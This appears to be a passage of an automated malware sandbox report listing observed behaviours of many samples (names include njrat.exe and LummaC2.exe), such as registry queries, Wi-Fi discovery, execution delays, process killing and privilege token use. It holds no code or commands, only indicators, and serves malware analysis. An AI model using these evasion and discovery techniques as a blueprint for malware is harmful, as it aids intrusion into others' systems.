Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\4363463463464363463463463\Files\GoogleUpdate.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\4363463463464363463463463\Files\DivineDialogue.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\4363463463464363463463463\Files\njrat.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\New Text Document mod.exse\a\neptuno.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\tasklist.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\New Text Document mod.exse\a\Filezilla.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\sysnldcvmr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\findstr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\4363463463464363463463463\Files\4434.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\findstr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\4363463463464363463463463\Files\t.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\New Text Document mod.exse\a\Out2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files\Google\Chrome\Application\SS0T34UUZ0O3B.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\New Text Document mod.exse\a\BWCStartMSI.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\4363463463464363463463463\Files\s.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\New Text Document mod.exse\a\Filezilla.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\4363463463464363463463463\Files\g9win6bb.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\tasklist.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\4363463463464363463463463\Files\LummaC2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\4363463463464363463463463\Files\pp.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\614016133.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\609587\Horizon.pif N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\4363463463464363463463463\Files\dayum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\4363463463464363463463463\Files\random.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\findstr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\choice.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

System Network Configuration Discovery: Wi-Fi Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\Desktop\4363463463464363463463463\Files\noll.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\Desktop\4363463463464363463463463\Files\noll.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\system32\systeminfo.exe N/A

GoLang User-Agent

Description Indicator Process Target
HTTP User-Agent header Go-http-client/1.1 N/A N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A

Modifies Control Panel

evasion
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\Desktop\TileWallpaper = "0" C:\Users\Admin\AppData\Local\Microsoft\BingWallpaperApp\BingWallpaperApp.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser C:\Windows\Explorer.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\Explorer.EXE N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings C:\Users\Admin\Desktop\New Text Document mod.exse\a\cv.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings C:\Users\Admin\Desktop\New Text Document mod.exse\a\FINAL_PDF.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A8CDFF1C-4878-43be-B5FD-F8091C1C60D0}\Instance\ C:\Windows\Explorer.EXE N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Users\Admin\Desktop\4363463463464363463463463\Files\freedom.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\x.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\x.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\FINAL_PDF.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\FINAL_PDF.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\Filezilla-stage2.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\Filezilla-stage2.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\cv.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\cv.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\Filezilla.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\Filezilla.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\Desktop\4363463463464363463463463\Files\boleto.exe N/A
N/A N/A C:\Users\Admin\Desktop\4363463463464363463463463\Files\boleto.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\rundll32.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\4363463463464363463463463\4363463463464363463463463.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\New Text Document mod.exse\New Text Document mod.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\x.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\FINAL_PDF.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\x.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\cv.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\system32.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\4363463463464363463463463\Files\boleto.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\Filezilla.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\Filezilla-stage2.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\test.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\Program Files\7-Zip\7zG.exe N/A
N/A N/A C:\Program Files\7-Zip\7zG.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\609587\Horizon.pif N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\609587\Horizon.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\609587\Horizon.pif N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\115839\Leaving.pif N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\115839\Leaving.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\115839\Leaving.pif N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Windows Startup\Sever Startup.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\BingWallpaperApp\BingWallpaperApp.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
